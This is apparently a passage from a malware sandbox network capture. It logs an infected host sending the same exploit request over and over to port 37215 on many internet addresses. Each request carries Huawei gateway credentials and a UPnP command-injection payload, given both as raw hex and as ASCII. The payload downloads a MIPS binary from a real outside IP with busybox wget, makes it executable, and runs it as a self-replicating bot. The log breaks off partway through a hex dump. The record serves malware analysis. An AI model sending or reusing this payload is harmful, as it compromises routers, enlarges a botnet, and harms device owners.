                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  765192.168.2.1347666157.27.40.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.348064899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  766192.168.2.135153437.211.19.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.348078966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  767192.168.2.1356298157.180.198.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.348098993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  768192.168.2.1333976197.254.94.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.348105907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  769192.168.2.133894641.172.15.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.351126909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  770192.168.2.133337658.19.14.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.354995966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  771192.168.2.1355922103.158.219.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355000973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  772192.168.2.133828099.65.45.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355014086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  773192.168.2.1336912157.180.224.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355037928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  774192.168.2.135900241.237.158.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.355046988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 